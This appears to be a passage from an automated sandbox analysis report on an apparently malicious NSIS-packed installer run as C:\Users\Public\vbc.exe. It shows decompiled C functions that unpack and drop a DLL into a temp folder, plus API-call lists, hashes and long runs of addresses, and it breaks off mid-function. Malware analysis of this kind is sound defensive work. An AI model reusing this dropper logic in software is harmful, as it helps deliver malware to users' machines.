0x00406d60
0x00406d62
0x00406d64
0x00406d64
0x00406d65
0x00406d68
0x00406d6f
0x00406d72
0x00406d80
0x00000000
0x00000000
0x00407056
0x00407056
0x00407059
0x00407060
0x00000000
0x00000000
0x00407065
0x00407065
0x00407069
0x004071a1
0x00000000
0x004071a1
0x0040706f
0x00407072
0x00407075
0x00407079
0x0040707c
0x00407082
0x00407084
0x00407084
0x00407084
0x00407087
0x0040708a
0x0040708a
0x0040708a
0x0040708a
0x0040708d
0x0040708d
0x00407091
0x004070f1
0x004070f4
0x004070f9
0x004070fa
0x004070fc
0x004070fe
0x00407101
0x00000000
0x00407101
0x00407093
0x00407099
0x0040709c
0x0040709f
0x004070a2
0x004070a5
0x004070a8
0x004070ab
0x004070ae
0x004070b1
0x004070b4
0x004070cd
0x004070d0
0x004070d3
0x004070d6
0x004070da
0x004070dc
0x004070dc
0x004070dd
0x004070e0
0x004070b6
0x004070b6
0x004070be
0x004070c3
0x004070c5
0x004070c8
0x004070c8
0x004070e3
0x004070ea
0x00000000
0x004070ec
0x00000000
0x004070ec
0x00000000
0x00406d88
0x00406d8b
0x00406dc1
0x00406ef1
0x00406ef1
0x00406ef1
0x00406ef1
0x00406ef4
0x00406ef4
0x00406ef7
0x00406ef9
0x00407183
0x00000000
0x00407183
0x00406eff
0x00406f02
0x00000000
0x00000000
0x00406f08
0x00406f0c
0x00406f0f
0x00406f0f
0x00406f0f
0x00000000
0x00406f0f
0x00406d8d
0x00406d8f
0x00406d91
0x00406d93
0x00406d96
0x00406d97
0x00406d99
0x00406d9b
0x00406d9e
0x00406da1
0x00406db7
0x00406dbc
0x00406df4
0x00406df4
0x00406df8
0x00406e24
0x00406e26
0x00406e2d
0x00406e30
0x00406e33
0x00406e33
0x00406e38
0x00406e38
0x00406e3a
0x00406e3d
0x00406e44
0x00406e47
0x00406e74
0x00406e74
0x00406e77
0x00406e7a
0x00406eee
0x00406eee
0x00406eee
0x00000000
0x00406eee
0x00406e7c
0x00406e82
0x00406e85
0x00406e88
0x00406e8b
0x00406e8e
0x00406e91
0x00406e94
0x00406e97
0x00406e9a
0x00406e9d
0x00406eb6
0x00406eb8
0x00406ebb
0x00406ebc
0x00406ebf
0x00406ec1
0x00406ec4
0x00406ec6
0x00406ec8
0x00406ecb
0x00406ecd
0x00406ed0
0x00406ed4
0x00406ed6
0x00406ed6
0x00406ed7
0x00406eda
0x00406edd
0x00406e9f
0x00406e9f
0x00406ea7
0x00406eac
0x00406eae
0x00406eb1
0x00406eb1
0x00406ee0
0x00406ee7
0x00406e71
0x00406e71
0x00406e71
0x00406e71
0x00000000
0x00406ee9
0x00000000
0x00406ee9
0x00406ee7
0x00406dfa
0x00406dfd
0x00406dff
0x00406e02
0x00406e05
0x00406e08
0x00406e0a
0x00406e0d
0x00406e10
0x00406e10
0x00406e13
0x00406e13
0x00406e16
0x00406e1d
0x00406df1
0x00406df1
0x00406df1
0x00406df1
0x00000000
0x00406e1f
0x00000000
0x00406e1f
0x00406e1d
0x00406da3
0x00406da6
0x00406da8
0x00406dab
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c95
0x00406c95
0x00406c99
0x0040715f
0x00000000
0x0040715f
0x00406c9f
0x00406ca2
0x00406ca5
0x00406ca8
0x00406caa
0x00406caa
0x00406caa
0x00406cad
0x00406cb0
0x00406cb3
0x00406cb6
0x00406cb9
0x00406cbc
0x00406cbd
0x00406cbf
0x00406cbf
0x00406cbf
0x00406cc2
0x00406cc5
0x00406cc8
0x00406ccb
0x00406ccb
0x00406ccb
0x00406cce
0x00000000
0x00000000
0x00406f12
0x00406f12
0x00406f12
0x00406f16
0x00000000
0x00000000
0x00406f1c
0x00406f1f
0x00406f22
0x00406f25
0x00406f27
0x00406f27
0x00406f27
0x00406f2a
0x00406f2d
0x00406f30
0x00406f33
0x00406f36
0x00406f39
0x00406f3a
0x00406f3c
0x00406f3c
0x00406f3c
0x00406f3f
0x00406f42
0x00406f45
0x00406f48
0x00406f4b
0x00406f4f
0x00406f51
0x00406f54
0x00000000
0x00406f56
0x00000000
0x00406f56
0x00406f54
0x00407189
0x00000000
0x00000000
0x004067b8

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69107d409a21aceab355f2bdda7f7152adad7d75b4471f7616c4440fbc630a2e
Instruction ID: 6d311f2402807b87ac493386ce59d8e56409eb9bb3693b5a24021ea98ba03221
Opcode Fuzzy Hash: 69107d409a21aceab355f2bdda7f7152adad7d75b4471f7616c4440fbc630a2e
Instruction Fuzzy Hash: 3AF18571D04229CBDF28CFA8C8946ADBBB1FF44305F25816ED456BB281D3786A86CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0040659C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040659C(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x4225a0); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x4225a0;
			}

0x004065a7
0x004065b0
0x00000000
0x004065bd
0x004065b3
0x00000000

APIs

FindFirstFileA.KERNELBASE(76712754,004225A0,C:\Users\user\AppData\Local\Temp\nsrB9DF.tmp,00405CF1,C:\Users\user\AppData\Local\Temp\nsrB9DF.tmp,C:\Users\user\AppData\Local\Temp\nsrB9DF.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsrB9DF.tmp,C:\Users\user\AppData\Local\Temp\nsrB9DF.tmp,76712754,?,766F13E0,00405A10,?,76712754,766F13E0), ref: 004065A7
FindClose.KERNEL32(00000000), ref: 004065B3

Strings

C:\Users\user\AppData\Local\Temp\nsrB9DF.tmp, xrefs: 0040659C

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: Find$CloseFileFirst
String ID: C:\Users\user\AppData\Local\Temp\nsrB9DF.tmp
API String ID: 2295610775-2717606532
Opcode ID: a8a8e6ca181c7703a692eace486e77433675a7c42b8a8fe2eb47bb99df7a0189
Instruction ID: f69e928bf0ac745f57f8f0961b1e49234d8ba52852923c3f30ba08d6865e50e3
Opcode Fuzzy Hash: a8a8e6ca181c7703a692eace486e77433675a7c42b8a8fe2eb47bb99df7a0189
Instruction Fuzzy Hash: 64D01231615130FBC3411B38BE0C84B7A5C9F093303619B36F466F12E4D7748D62869C

Uniqueness

Uniqueness Score: -1.00%

Function 00402EF1, Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 204
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00402EF1(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v300;
				signed int _t54;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				signed int _t77;
				signed int _t82;
				signed int _t83;
				signed int _t89;
				intOrPtr _t92;
				long _t94;
				signed int _t102;
				signed int _t104;
				void* _t106;
				signed int _t107;
				signed int _t110;
				intOrPtr* _t111;

				_t94 = 0;
				_v8 = 0;
				_v12 = 0;
				 *0x424750 = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\Public\\vbc.exe", 0x400);
				_t106 = E00405DC1("C:\\Users\\Public\\vbc.exe", 0x80000000, 3);
				 *0x40a018 = _t106;
				if(_t106 == 0xffffffff) {
					return "Error launching installer";
				}
				E00406228("C:\\Users\\Public", "C:\\Users\\Public\\vbc.exe");
				E00406228(0x42c000, E00405C07("C:\\Users\\Public"));
				_t54 = GetFileSize(_t106, 0);
				__eflags = _t54;
				 *0x41f908 = _t54;
				_t110 = _t54;
				if(_t54 <= 0) {
					L24:
					E00402E52(1);
					__eflags =  *0x424758 - _t94;
					if( *0x424758 == _t94) {
						goto L32;
					}
					__eflags = _v12 - _t94;
					if(_v12 == _t94) {
						L28:
						_t111 = GlobalAlloc(0x40, _v20);
						E00406756(0x40b870);
						E00405DF0( &_v300, "C:\\Users\\Albus\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileA( &_v300, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
						__eflags = _t62 - 0xffffffff;
						 *0x40a01c = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E00403419( *0x424758 + 0x1c);
							 *0x41f90c = _t65;
							 *0x41f900 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00403192(_v16, 0xffffffff, _t94, _t111, _v20); // executed
							__eflags = _t68 - _v20;
							if(_t68 == _v20) {
								__eflags = _v40 & 0x00000001;
								 *0x424754 = _t111;
								 *0x42475c =  *_t111;
								if((_v40 & 0x00000001) != 0) {
									 *0x424760 =  *0x424760 + 1;
									__eflags =  *0x424760;
								}
								_t45 = _t111 + 0x44; // 0x44
								_t70 = _t45;
								_t102 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t111;
									_t102 = _t102 - 1;
									__eflags = _t102;
								} while (_t102 != 0);
								_t71 =  *0x41f8fc; // 0x8904f
								 *((intOrPtr*)(_t111 + 0x3c)) = _t71;
								E00405D7C(0x424780, _t111 + 4, 0x40);
								__eflags = 0;
								return 0;
							}
							goto L32;
						}
						return "Error writing temporary file. Make sure your temp folder is valid.";
					}
					E00403419( *0x41f8f8);
					_t77 = E00403403( &_a4, 4);
					__eflags = _t77;
					if(_t77 == 0) {
						goto L32;
					}
					__eflags = _v8 - _a4;
					if(_v8 != _a4) {
						goto L32;
					}
					goto L28;
				} else {
					do {
						_t107 = _t110;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x424758) & 0x00007e00) + 0x200;
						__eflags = _t110 - _t82;
						if(_t110 >= _t82) {
							_t107 = _t82;
						}
						_t83 = E00403403(0x4178f8, _t107);
						__eflags = _t83;
						if(_t83 == 0) {
							E00402E52(1);
							L32:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x424758;
						if( *0x424758 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402E52(0);
							}
							goto L20;
						}
						E00405D7C( &_v40, 0x4178f8, 0x1c);
						_t89 = _v40;
						__eflags = _t89 & 0xfffffff0;
						if((_t89 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v36 - 0xdeadbeef;
						if(_v36 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v24 - 0x74736e49;
						if(_v24 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v28 - 0x74666f73;
						if(_v28 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v32 - 0x6c6c754e;
						if(_v32 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t89;
						_t104 =  *0x41f8f8; // 0x8237b
						 *0x424800 =  *0x424800 | _a4 & 0x00000002;
						_t92 = _v16;
						__eflags = _t92 - _t110;
						 *0x424758 = _t104;
						if(_t92 > _t110) {
							goto L32;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v12 = _v12 + 1;
							_t110 = _t92 - 4;
							__eflags = _t107 - _t110;
							if(_t107 > _t110) {
								_t107 = _t110;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t110 -  *0x41f908; // 0x831db
						if(__eflags < 0) {
							_v8 = E004066E8(_v8, 0x4178f8, _t107);
						}
						 *0x41f8f8 =  *0x41f8f8 + _t107;
						_t110 = _t110 - _t107;
						__eflags = _t110;
					} while (_t110 != 0);
					_t94 = 0;
					__eflags = 0;
					goto L24;
				}
			}

0x00402efc
0x00402eff
0x00402f02
0x00402f1c
0x00402f21
0x00402f34
0x00402f39
0x00402f3f
0x00000000
0x00402f41
0x00402f52
0x00402f63
0x00402f6a
0x00402f70
0x00402f72
0x00402f77
0x00402f79
0x00403064
0x00403066
0x0040306b
0x00403072
0x00000000
0x00000000
0x00403078
0x0040307b
0x004030a7
0x004030b7
0x004030b9
0x004030ca
0x004030e5
0x004030eb
0x004030ee
0x004030f3
0x00403112
0x00403122
0x00403134
0x00403139
0x0040313e
0x00403141
0x0040314a
0x0040314e
0x00403156
0x0040315b
0x0040315d
0x0040315d
0x0040315d
0x00403165
0x00403165
0x00403168
0x00403169
0x00403169
0x0040316c
0x0040316e
0x0040316e
0x0040316e
0x00403171
0x00403178
0x00403184
0x00403189
0x00000000
0x00403189
0x00000000
0x00403141
0x00000000
0x004030f5
0x00403083
0x0040308e
0x00403093
0x00403095
0x00000000
0x00000000
0x0040309e
0x004030a1
0x00000000
0x00000000
0x00000000
0x00402f7f
0x00402f84
0x00402f89
0x00402f8d
0x00402f94
0x00402f99
0x00402f9b
0x00402f9d
0x00402f9d
0x00402fa1
0x00402fa6
0x00402fa8
0x00403101
0x00403143
0x00000000
0x00403143
0x00402fae
0x00402fb5
0x00403031
0x00403035
0x00403039
0x0040303e
0x00000000
0x00403035
0x00402fbe
0x00402fc3
0x00402fc6
0x00402fcb
0x00000000
0x00000000
0x00402fcd
0x00402fd4
0x00000000
0x00000000
0x00402fd6
0x00402fdd
0x00000000
0x00000000
0x00402fdf
0x00402fe6
0x00000000
0x00000000
0x00402fe8
0x00402fef
0x00000000
0x00000000
0x00402ff1
0x00402ff7
0x00403000
0x00403006
0x00403009
0x0040300b
0x00403011
0x00000000
0x00000000
0x00403017
0x0040301b
0x00403023
0x00403023
0x00403026
0x00403029
0x0040302b
0x0040302d
0x0040302d
0x00000000
0x0040302b
0x0040301d
0x00403021
0x00000000
0x00000000
0x00000000
0x0040303f
0x0040303f
0x00403045
0x00403051
0x00403051
0x00403054
0x0040305a
0x0040305a
0x0040305a
0x00403062
0x00403062
0x00000000
0x00403062

APIs

GetTickCount.KERNEL32(76712754,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00402F05
GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\vbc.exe,00000400), ref: 00402F21

Part of subcall function 00405DC1: GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\Public\vbc.exe,80000000,00000003), ref: 00405DC5
Part of subcall function 00405DC1: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405DE7

GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,C:\Users\Public,C:\Users\Public,C:\Users\Public\vbc.exe,C:\Users\Public\vbc.exe,80000000,00000003), ref: 00402F6A
GlobalAlloc.KERNEL32(00000040,0040A130), ref: 004030AC

Strings

Null, xrefs: 00402FE8
"C:\Users\Public\vbc.exe" , xrefs: 00402EF1
Inst, xrefs: 00402FD6
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00403143
C:\Users\Public, xrefs: 00402F4C, 00402F51, 00402F57
Error launching installer, xrefs: 00402F41
soft, xrefs: 00402FDF
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004030F5
C:\Users\Public\vbc.exe, xrefs: 00402F0B, 00402F1A, 00402F2E, 00402F4B
C:\Users\user\AppData\Local\Temp\, xrefs: 00402EFB, 004030C4

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\Public\vbc.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\Public$C:\Users\Public\vbc.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 2803837635-1404970732
Opcode ID: ca76f8d495ce3895f444a46e92879b513e81ddc2aff1e21a5d111d80dade61e3
Instruction ID: 41f98d992e8437d8d417f3691d947d8f632b5d0a71237712da2b0bb715ca9b84
Opcode Fuzzy Hash: ca76f8d495ce3895f444a46e92879b513e81ddc2aff1e21a5d111d80dade61e3
Instruction Fuzzy Hash: 1B71E131A00259ABDB20AF64DD85B9E3BACEB44355F20803BF911BA2D1C77C9E418B5C

Uniqueness

Uniqueness Score: -1.00%

Function 003D13F0, Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 356memoryfileCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 003D1739
CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 003D179B

Strings

5cd4190b0f424c1ba550357b44f5a494, xrefs: 003D1808, 003D180B

Memory Dump Source

Source File: 00000004.00000002.2162147549.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: AllocCreateFileVirtual
String ID: 5cd4190b0f424c1ba550357b44f5a494
API String ID: 1475775534-4174767169
Opcode ID: aadeebf3583a9c1a2246f2852ff14bfb9d801c7c3db531d9081f9158973a0633
Instruction ID: aaae4c7363c1a3fcfe9c4a4f832c8f2f854ae64ddbac44a4d92db7fd5e8da345
Opcode Fuzzy Hash: aadeebf3583a9c1a2246f2852ff14bfb9d801c7c3db531d9081f9158973a0633
Instruction Fuzzy Hash: DBE15C21D44388EEEB21CBE4EC16BEDBBB5AF04710F10449AE648FE2D1D7B10A84DB15

Uniqueness

Uniqueness Score: -1.00%

Function 00401759, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147
stringtimeCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00401759(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				CHAR* _t83;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402BCE(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E00405C2D(_t82);
				_push(_t82);
				_t83 = "uvlcopdlxoed";
				if(_t33 == 0) {
					lstrcatA(E00405BC0(E00406228(_t83, "C:\\Users\\Albus\\AppData\\Local\\Temp")), ??);
				} else {
					E00406228();
				}
				E00406503(_t83);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E0040659C(_t83);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E00405D9C(_t83);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E00405DC1(_t83, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0xc) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E0040534F(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x4247e8;
						goto L32;
					} else {
						E00406228(0x40ac20, 0x425000);
						E00406228(0x425000, _t83);
						E004062BB(_t75, 0x40ac20, _t83, "C:\Users\Albus\AppData\Local\Temp\nsrB9DF.tmp\lk95ejdjuy.dll",  *((intOrPtr*)(_t85 - 0x14)));
						E00406228(0x425000, 0x40ac20);
						_t62 = E00405944("C:\Users\Albus\AppData\Local\Temp\nsrB9DF.tmp\lk95ejdjuy.dll",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x4247e8 =  &( *0x4247e8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(_t83);
								_push(0xfffffffa);
								E0040534F();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E0040534F(0xffffffea,  *(_t85 - 8));
				 *0x424814 =  *0x424814 + 1;
				_t43 = E00403192(_t77,  *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 0xc), _t75, _t75); // executed
				 *0x424814 =  *0x424814 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t85 - 0xc)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E004062BB(_t75, _t80, _t83, _t83, 0xffffffee);
					} else {
						E004062BB(_t75, _t80, _t83, _t83, 0xffffffe9);
						lstrcatA(_t83,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(_t83);
					E00405944();
					goto L29;
				}
				goto L33;
			}

0x00401759
0x00401760
0x00401769
0x0040176c
0x0040176f
0x00401774
0x00401775
0x0040177c
0x00401798
0x0040177e
0x0040177f
0x0040177f
0x0040179e
0x004017a8
0x004017a8
0x004017ac
0x004017af
0x004017b4
0x004017b6
0x004017b8
0x004017bd
0x004017bd
0x004017c8
0x004017c8
0x004017d9
0x004017db
0x004017db
0x004017dc
0x004017dc
0x004017df
0x004017e2
0x004017e5
0x004017e5
0x004017ec
0x004017fb
0x00401800
0x00401803
0x00401806
0x00000000
0x00000000
0x00401808
0x0040180b
0x00401865
0x0040186a
0x004015b0
0x004027bf
0x004027bf
0x00402a5a
0x00402a5d
0x00402a5d
0x00000000
0x0040180d
0x00401813
0x0040181e
0x0040182b
0x00401836
0x0040184c
0x0040184c
0x0040184f
0x00000000
0x00401855
0x00401855
0x00401856
0x00401873
0x00402a63
0x00402a63
0x00402a63
0x00401858
0x00401858
0x00401859
0x00401492
0x00402387
0x00402387
0x00402387
0x00401856
0x0040184f
0x00402a65
0x00402a69
0x00402a69
0x00401883
0x00401888
0x00401896
0x0040189b
0x004018a1
0x004018a5
0x004018a7
0x004018af
0x004018bb
0x004018a9
0x004018a9
0x004018ad
0x00000000
0x00000000
0x004018ad
0x004018c4
0x004018ca
0x004018cc
0x00000000
0x004018d2
0x004018d2
0x004018d5
0x004018ed
0x004018d7
0x004018da
0x004018e3
0x004018e3
0x004018f2
0x004018f7
0x00402382
0x00000000
0x00402382
0x00000000

APIs

lstrcatA.KERNEL32(00000000,00000000,uvlcopdlxoed,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401798
CompareFileTime.KERNEL32(-00000014,?,uvlcopdlxoed,uvlcopdlxoed,00000000,00000000,uvlcopdlxoed,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017C2

Part of subcall function 00406228: lstrcpynA.KERNEL32(?,?,00000400,00403533,00423F40,NSIS Error,?,00000007,00000009,0000000B), ref: 00406235

Part of subcall function 0040534F: lstrlenA.KERNEL32(00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 00405388
Part of subcall function 0040534F: lstrlenA.KERNEL32(00402EC9,00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 00405398
Part of subcall function 0040534F: lstrcatA.KERNEL32(00420530,00402EC9,00402EC9,00420530,00000000,00000000,00000000), ref: 004053AB
Part of subcall function 0040534F: SetWindowTextA.USER32(00420530,00420530), ref: 004053BD
Part of subcall function 0040534F: SendMessageA.USER32 ref: 004053E3
Part of subcall function 0040534F: SendMessageA.USER32 ref: 004053FD
Part of subcall function 0040534F: SendMessageA.USER32 ref: 0040540B

Strings

C:\Users\user\AppData\Local\Temp\nsrB9DF.tmp\lk95ejdjuy.dll, xrefs: 00401826, 00401842
uvlcopdlxoed, xrefs: 00401775, 0040177E, 0040178B, 0040179D, 004017AE, 004017E4, 004017FA, 00401818, 00401858, 004018D9, 004018E2, 004018EC, 004018F7
C:\Users\user\AppData\Local\Temp, xrefs: 00401786

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsrB9DF.tmp\lk95ejdjuy.dll$uvlcopdlxoed
API String ID: 1941528284-3489679692
Opcode ID: ebc504ea436e693e663a4b144fd74c24bb863413e05106ae1afc4e96b16114fd
Instruction ID: 94ce822b9f6a6483fb8de35dc0b51f709499be211a85e0d844596cfba341e8bc
Opcode Fuzzy Hash: ebc504ea436e693e663a4b144fd74c24bb863413e05106ae1afc4e96b16114fd
Instruction Fuzzy Hash: 0541B931900515BACF107BB5DC45EAF7AB8DF05369B60863FF422B11E1CA7C8A528A6D

Uniqueness

Uniqueness Score: -1.00%

Function 003D091E, Relevance: 10.7, APIs: 7, Instructions: 237fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 003D0A20
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 003D0BED

Memory Dump Source

Source File: 00000004.00000002.2162147549.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: 39fd92495d807123e8d317974e5c9ea65eb60508606e6e94cb9b6630f1585058
Instruction ID: 960bad54558e661f087eb1e67381bf8f3a9e1ee0cdb56004758c4f99365738f9
Opcode Fuzzy Hash: 39fd92495d807123e8d317974e5c9ea65eb60508606e6e94cb9b6630f1585058
Instruction Fuzzy Hash: 87A12232D04209EFDF16CFE4E885BADBBB1FF08715F20845AE515BA2A0D3749A80DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00405815, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405815(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

